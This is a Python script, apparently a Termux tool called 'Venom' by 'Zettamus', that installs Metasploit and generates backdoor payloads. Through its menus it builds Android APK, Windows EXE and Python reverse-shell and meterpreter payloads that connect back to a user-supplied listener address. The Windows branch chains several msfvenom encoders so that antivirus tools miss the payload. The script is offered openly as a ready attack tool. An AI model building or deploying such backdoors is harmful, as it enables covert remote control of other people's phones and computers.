#!/usr/bin/env python3
# Coded : Zettamus © 2019
# Contact me on WA : 081242873775
# Contact me on Telegram : t.me/zettamus
# Codenya berantakan :v
# RECODE? Silahkan, but jgn hapus nama author di atas_-
# Version : 1.1

# Import Module :
import os,time, getpass, socket, requests,sys,random


# Colours :
Y = '\033[93m' # Yellow
C = '\033[1;36m' # Cyan
G = '\x1b[32m' # Green
R = '\033[31;1m' # Red
W = '\x1b[1;97m' # White 
g = '\033[90m' # Grey
r = "\033[0m" # Reset

# Setting :
getpass=getpass.getpass
os=os.system
sleep=time.sleep
now=time.strftime
os('dpkg --configure -a')
os('clear')
try:
    versi='1.2'
    requp=requests.get('https://raw.githubusercontent.com/zettamus/backdoor/master/README.md').text
    if versi in str(requp):
        up='[99] Update '
        update=g+'['+C+'*'+g+'] Updating venom tools...'
        ver='[!] New version is available. Update now'
except: pass

def tik(s):
    for c in s + '\n':
        sys.stdout.write(c)
        sys.stdout.flush()
        sleep(random.random() * 0.1)

# BANNER #
def banner():
    print(C+'''



            db.  .db d88888b  d8b   db   .d88b.  .88b  d88.
            88'  '88 88       888o  88  .8P  Y8. 88'YbdP`88
            Y8    8P 88ooooo  88V8o 88  88    88 88  88  88
            `8b  d8' 88       88 V8o88  88    88 88  88  88
              8bd8   88.      88  V888  `8b  d8' 88  88  88
               YP    Y88888P  VP   V8P   `Y88P   YP  YP  YP
                        --------{}XIUZ_SEC{}--------
                           BACKDOOR METASPLOIT
                               GEN3RATOR
   '''.format(R,C))
    print(g+'['+C+'A'+g+']uthor : '+G+'Zettamus      '+g+'['+C+'V'+g+']ersion :'+G+' 1.1')
    print(g+'['+C+'G'+g+']ithub : '+G+'Github.com/zettamus'+r)
    try:
        tik('\n'+ver)
    except:
        pass

# IP ADDRESS #
def ip():
    host=socket.gethostname()
    print(g+'['+C+now()+g+'] Hostname : '+host)
    try:
        print(g+'['+C+'*'+g+'] IP Address : '+socket.gethostbyname('google.com'))
    except socket.gaierror:
        tik(g+'['+R+'!'+g+'] IP Address : No connection')
        getpass(g+'['+R+'!'+g+'] This tools required  internet\n'+g+'['+R+'!'+g+'] Prees ['+C+'Enter'+g+'] to Continue but functions may not work properly')


# Check Venom
# Check Metasploit #
banner()
cek=os('which venom > /dev/null 2>&1')
if cek !=0:
    tik(g+'['+C+ now("%X") +g+'] Move file'+G+'venom '+g+'to path '+R+'$HOME/../usr/bin')
    time.sleep(2)
    os('mv venom $HOME/../usr/bin > /dev/null 2>&1')
    exit(tik(g+'['+C+ now("%X") +g+'] Now, you can run venom with command '+R+'venom'+g+'in anywhere'))
tik(g+'['+C+time.strftime("%X")+g+'] Checking Metasploit')
sleep(1)
msf=os('which msfconsole > /dev/null 2>&1')
if msf == 0:
    print(g+'['+C+ now("%X") +g+'] Metasploit Found')
    getpass(g+'['+C+now("%X")+g+'] Press ['+C+'Enter'+g+'] to Continue ')
else:
    ins=input(g+'['+R+now("%X")+g+'] Metasploit Not Found \n\n['+R+now("%X")+g+'] Do you want to install ['+C+'Y'+g+'/'+C+'n'+g+'] : '+G)
    if ins =='':
        exit(g+'['+R+now("%X")+g+'] Exit: Ok!')
    elif ins in ['Y','y']:
        tanya=input(g+'['+R+'NOTE'+g+'] This installation requires +500Mb free space \n'+g+'['+R+now("%X")+g+'] Type "'+R+'Exit'+g+'" to exit and press ['+G+'Enter'+g+'] to Continue : '+G)
        if tanya in ['Exit','exit','EXIT']:
            exit(g+'['+R+now("%X")+g+'] User Exit!')
        else:
            try:
                print(g+'['+C+now("%X")+g+'] Update Termux..')
                os('apt-get update -y > /dev/null 2>&1;apt-get upgrade -y > /dev/null 2>&1')
                print(g+'['+C+now("%X")+g+'] Installing X11-Repository and Unstable-Repo... ')
                os('apt-get install x11-repo -y > /dev/null 2>&1;apt-get install unstable-repo -y > /dev/null 2>&1')
                tik( g+"["+C+now("%X")+g+"]  Metasploit Install.. \n\n["+R+"WARN"+g+"] Do not exit the terminal\n["+R+"WARN"+g+"] "+G+"Don't do any surgery")
                getpass(g+'['+C+now("%X")+g+'] this takes 20 minutes or more, make sure your internet connection is stable '+g+'\n['+C+now+g+'] Press ['+C+'Enter'+g+'] to Continue ')
                io=os('apt-get install metasploit -y')
                if io==0:
                    lo=os('which msfconsole > /dev/null 2>&1')
                    if lo==0:
                        print(g+'['+C+now("%X")+g+'] Metasploit-Framework successfully installed in your device ')
                        tik(g+'['+C+now("%X")+g+'] Now,you can run METASPLOIT with command '+G+'msfconsole'+g+' and '+G+'msfvenom ')
                        getpass(g+'['+C+now("%X")+g+'] Press ['+C+'Enter'+g+'] to Continue ')
                        exit(os('venom'))
                    else:
                        exit(g+'['+R+now("%X")+g+'] Sorry, Metasploit cannot be installed on your device \n'+g+'['+R+now("%X")+g+'] Contact me on WA : 081247483775')
                else:
                    exit(g+'['+R+now("%X")+g+'] Sorry, Metasploit cannot be installed on your device \n'+g+'['+R+now("%X")+g+'] Contact me on WA : 081247483775')
            except KeyboardInterrupt:
                tik(g+'\n['+R+now("%X")+g+'] Ctrl - C or Ctrl - D Detected \n'+g+'['+R+'!'+g+'] Stopped all ')
                os('dpkg --configure -a')
                exit()
    else:
        exit(g+'['+R+now("%X")+g+'] User Exit!')
os('clear')


# MENU VENOM #
def menu():
    banner()
    print(g+'['+C+'01'+g+'] Create Backdoor ')
    print(g+'['+C+'02'+g+'] Jump to msfconsole')
    try:
        tik(up)
    except: pass
    print(g+'['+R+'00'+g+'] Exit')
    try:
        zett=input(g+'['+R+'##'+g+'] Zettamus'+Y+'/> '+G)
    except KeyboardInterrupt:
        exit(g+'['+R+now("%X")+g+'] Key Interrupt : '+R+'Exit!')
    if zett =='':
        exit(g+'\n['+R+now("%X")+g+'] Dont be empty')
    elif zett in ['1','01']:
        choose()
    elif zett in ['2','02']:
        msf()
    elif zett in ['0','00']:
        exit(tik(g+'\n['+R+now("%X")+g+'] VENOM TOOLS : EASY TO USE'))
    elif zett == '99':
        try:
            tik(update)
            print(g+'['+C+now("%X")+g+'] Please Wait..')
            os('cd ..;rm -rf backdoor')
            os('cd ..;git clone https://github.com/zettamus/backdoor > /dev/null 2>&1')
            tik( g+'['+C+now("%X")+g+'] Update Successfully ')
            os('mv $HOME/backdoor/venom $HOME/../usr/bin')
            exit(tik(g+'['+C+now("%X")+g+'] Now, you can run '+G+'Venom tools'+g+' with command '+C+'venom'+g+' in everywhere '))
        except:
            exit(tik(g+'['+C+now("%X")+g+'] Your venom is the latest version'))
    else:
        exit(g+'\n['+R+now("%X")+g+'] Wrong input ')

# MENU BACKDOOR #
def choose():
    print(g+'['+C+'**'+g+'] Choose Your method\n['+C+'01'+g+'] Android Backdoor \n['+C+'02'+g+'] Windows Backdoor\n['+C+'03'+g+'] Python Backdoor\n['+R+'00'+g+'] '+R+'Exit')
    pilih=input(g+'['+R+'##'+g+'] Zettamus'+Y+'/> '+G)
    if pilih =='':
        exit('['+R+now("%X")+g+'] Dont be empty')
    elif pilih in ['1','01']:
        backdoor()
    elif pilih in ['2','02']:
        windows()
    elif pilih in ['3','03']:
        python()
    elif pilih in ['0','00']:
        exit(g+'['+R+now("%X")+g+'] Exit ')
    else:
        exit(g+'['+R+now("%X")+g+'] Wrong input')
def backdoor():
    print(g+'['+C+'**'+g+'] Choose Your method\n['+C+'01'+g+'] android/meterpreter/reverse_https\n['+C+'02'+g+'] android/meterpreter/reverse_http\n['+C+'03'+g+'] android/meterpreter/reverse_tcp\n['+C+'04'+g+'] android/shell/reverse_https\n['+C+'05'+g+'] android/shell/reverse_http\n['+C+'06'+g+'] android/shell/reverse_tcp')
    co=input(g+'['+R+'##'+g+'] Zettamus'+Y+'/> '+G)
    if co =='':
        exit('['+R+now("%X")+g+'] Dont be empty')
    elif co in ['1','01']:
        method='android/meterpreter/reverse_https'
    elif co in ['2','02']:
        method='android/meterpreter/reverse_http'
    elif co in ['3','03']:
        method='android/meterpreter/reverse_tcp'
    elif co in ['4','04']:
        method='android/shell/reverse_https'
    elif co in ['5','05']:
        method='android/shell/reverse_http'
    elif co in ['6','06']:
        method='android/shell/reverse_tcp'
    else: exit(g+'['+R+now("%X")+g+'] Wrong Input ')
    lhost=input(g+'['+R+'?'+g+'] LHOST : '+G)
    if lhost =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    lport=input(g+'['+R+'?'+g+'] LPORT : '+G)
    if len(lport) < 4:
        exit(g+'['+R+now("%X")+g+'] Exit : LPORT must be 4 digit')
    elif lport =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    nama=input(g+'['+R+'?'+g+'] Payload name : '+G)
    if nama =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    elif '.apk' in nama:
        pass
    else:
        nama=nama+'.apk'
    print(g+'['+C+now("%X")+g+'] Running Proccess ')
    print(g+'['+C+now("%X")+g+'] Creating Payload with lhost',C+lhost+g,'and lport',G+lport)
    cr=os('msfvenom -p '+method+' LHOST='+lhost+' LPORT='+lport+' -f raw -o /data/data/com.termux/files/home/backdoor/'+nama+' > /dev/null 2>&1')
    if cr == 0:
        tik( g+'['+C+now("%X")+g+'] Succesfully creating backdoor payload\n'+g+'['+C+now("%X")+g+'] Payload saved it : '+G+'home/backdoor/'+nama)
    else:
        exit(g+'['+R+now("%X")+g+'] Error When Create backdoor')
    msf=input(g+'['+C+now("%X")+g+'] Do you want to jump to msfconsole ['+G+'Y'+g+'/'+R+'n'+g+'] : '+C)
    if msf in ['Y','y']:
        print(g+'['+C+ now("%X") +g+'] Running Postgresql')
        os('pg_ctl -D $PREFIX/var/lib/postgresql start > /dev/null 2>&1')
        print(g+'['+C+now("%X")+g+'] Running msfconsole ')
        exit(os('msfconsole'))
    else:
        exit(g+'['+R+now("%X")+g+'] Exit: Ok!')
def msf():
    print(g+'['+C+now("%X")+g+'] Running Postgresql')
    os('pg_ctl -D $PREFIX/var/lib/postgresql start > /dev/null 2>&1')
    print(g+'['+C+now("%X")+g+'] Running msfconsole ')
    exit(os('msfconsole'))
def windows():
    print(g+'['+C+'**'+g+'] Choose Your method\n['+C+'01'+g+'] windows/meterpreter/reverse_https\n['+C+'02'+g+'] windows/meterpreter/reverse_http\n['+C+'03'+g+'] windows/meterpreter/reverse_tcp\n['+C+'04'+g+'] windows/shell/reverse_https\n['+C+'05'+g+'] windows/shell/reverse_http\n['+C+'06'+g+'] windows/shell/reverse_tcp')
    co=input(g+'['+R+'##'+g+'] Zettamus'+Y+'/> '+G)
    if co =='':
        exit('['+R+now("%X")+g+'] Dont be empty')
    elif co in ['1','01']:
        method='windows/meterpreter/reverse_https'
    elif co in ['2','02']:
        method='windows/meterpreter/reverse_http'
    elif co in ['3','03']:
        method='windows/meterpreter/reverse_tcp'
    elif co in ['4','04']:
        method='windows/shell/reverse_https'
    elif co in ['5','05']:
        method='windows/shell/reverse_http'
    elif co in ['6','06']:
        method='windows/shell/reverse_tcp'
    else:
        exit(g+'['+R+now("%X")+g+'] Wrong Input ')
    lhost=input(g+'['+R+'?'+g+'] LHOST : '+G)
    if lhost =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    lport=input(g+'['+R+'?'+g+'] LPORT : '+G)
    if len(lport) < 4:
        exit(g+'['+R+now("%X")+g+'] Exit : LPORT must be 4 digit')
    elif lport =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    nama=input(g+'['+R+'?'+g+'] Payload name : '+G)
    if nama =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    elif '.exe' in nama:
        pass
    else:
        nama=nama+'.exe'
    print(g+'['+C+now("%X")+g+'] Running Proccess ')
    print(g+'['+C+now("%X")+g+'] Creating Payload with lhost',C+lhost+g,'and lport',G+lport)
    cr=os('msfvenom -p '+method+' LHOST='+lhost+' LPORT='+lport+' -f raw -e x86/shikata_ga_nai -i 10 /dev/null 2>&1 | msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw /dev/null 2>&1 | msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1 /dev/null 2>&1 | msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 /dev/null 2>&1 | msfvenom  -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o $HOME/backdoor/'+nama+' > /dev/null 2>&1')
    if cr == 0:
        tik( g+'['+C+now("%X")+g+'] Succesfully creating backdoor payload\n'+g+'['+C+now("%X")+g+'] Payload saved it : '+G+'home/backdoor/'+nama)
    else:
        exit(g+'['+R+now("%X")+g+'] Error When Create backdoor')
    msf=input(g+'['+C+now("%X")+g+'] Do you want to jump to msfconsole ['+G+'Y'+g+'/'+R+'n'+g+'] : '+C) 
    if msf in ['Y','y']:
        print(g+'['+C+ now("%X") +g+'] Running Postgresql')
        os('pg_ctl -D $PREFIX/var/lib/postgresql start > /dev/null 2>&1')
        print(g+'['+C+now("%X")+g+'] Running msfconsole ')
        exit(os('msfconsole'))
    else:
        exit(g+'['+R+now("%X")+g+'] Exit: Ok!')
def python():
    print(g+'['+C+'**'+g+'] Choose Your method\n['+C+'01'+g+'] python/meterpreter/reverse_https\n['+C+'02'+g+'] python/meterpreter/reverse_http\n['+C+'03'+g+'] python/meterpreter/reverse_tcp\n['+C+'04'+g+'] python/meterpreter_reverse_https\n['+C+'05'+g+'] python/meterpreter_reverse_http\n['+C+'06'+g+'] python/shell_reverse_tcp')
    co=input(g+'['+R+'##'+g+'] Zettamus'+Y+'/> '+G)
    if co =='':
        exit('['+R+now("%X")+g+'] Dont be empty')
    elif co in ['1','01']:
        method='python/meterpreter/reverse_https'
    elif co in ['2','02']:
        method='python/meterpreter/reverse_http'
    elif co in ['3','03']:
        method='python/meterpreter/reverse_tcp'
    elif co in ['4','04']:
        method='python/meterpreter_reverse_https'
    elif co in ['5','05']:
        method='python/meterpreter_reverse_http'
    elif co in ['6','06']:
        method='python/shell_reverse_tcp'
    else: exit(g+'['+R+now("%X")+g+'] Wrong Input ')
    lhost=input(g+'['+R+'?'+g+'] LHOST : '+G)
    if lhost =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    lport=input(g+'['+R+'?'+g+'] LPORT : '+G)
    if len(lport) < 4:
        exit(g+'['+R+now("%X")+g+'] Exit : LPORT must be 4 digit')
    elif lport =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    nama=input(g+'['+R+'?'+g+'] Payload name : '+G)
    if nama =='':
        exit(g+'['+R+now("%X")+g+'] Dont be empty')
    elif '.py' in nama:
        pass
    else:
        nama=nama+'.py'
    print(g+'['+C+now("%X")+g+'] Running Proccess ')
    print(g+'['+C+now("%X")+g+'] Creating Payload with lhost',C+lhost+g,'and lport',G+lport)
    cr=os('msfvenom -p '+method+' LHOST='+lhost+' LPORT='+lport+' -f raw -o /data/data/com.termux/files/home/backdoor/'+nama+' > /dev/null 2>&1')
    if cr == 0:
        tik( g+'['+C+now("%X")+g+'] Succesfully creating backdoor payload\n'+g+'['+C+now("%X")+g+'] Payload saved it : '+G+'home/backdoor/'+nama)
    else:
        exit(g+'['+R+now("%X")+g+'] Error When Create backdoor')
    msf=input(g+'['+C+now("%X")+g+'] Do you want to jump to msfconsole ['+G+'Y'+g+'/'+R+'n'+g+'] : '+C)
    if msf in ['Y','y']:
        print(g+'['+C+ now("%X") +g+'] Running Postgresql')
        os('pg_ctl -D $PREFIX/var/lib/postgresql start > /dev/null 2>&1')
        print(g+'['+C+now("%X")+g+'] Running msfconsole ')
        exit(os('msfconsole'))
    else:
        exit(g+'['+R+now("%X")+g+'] Exit: Ok!')
if __name__ == '__main__':
    #Maaf ya codenya berantakan
    menu()
